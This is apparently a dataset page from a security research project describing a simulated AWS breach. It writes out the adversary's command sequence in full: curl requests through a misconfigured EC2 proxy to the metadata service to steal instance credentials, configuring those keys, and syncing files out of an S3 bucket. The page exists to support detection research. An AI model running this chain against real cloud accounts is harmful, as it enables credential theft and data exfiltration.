AWS Cloud Bank Breach S3

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/13

Modification Date

2020/09/13

Tactics

TA0001,TA0003,TA0004,TA0005,TA0009

Techniques

T1078.004,T1530

Tags

EC2 Proxy Abuse,S3 Data Exfiltration

Dataset Description

This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.

Simulation Metadata

Tools

type

Name

Module

Cloud Formation Templates

AWS CLI

Exfiltration

Adversary View

> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H "Host:169.254.169.254"                                            
MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0                                                                                                                                                              >

> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H "Host:169.254.169.254"
{
"Code" : "Success",
"LastUpdated" : "2020-09-14T00:49:26Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIA5FLZVX4OPVKKVBMX",
"SecretAccessKey" : "aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03",
"Token" : "TOKEN",
"Expiration" : "2020-09-14T07:10:27Z"
}

> aws configure --profile erratic
AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX
AWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03
Default region name [None]: us-east-1
Default output format [None]: json

> echo aws_session_token = "TOKEN" >> ~/.aws/credentials 

> aws s3 ls --profile erratic
2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642
2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a

> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26         89 ring.txt

> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26         89 ring.txt

> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic                                   
download: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/collection/ec2_proxy_s3_exfiltration.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.head(1)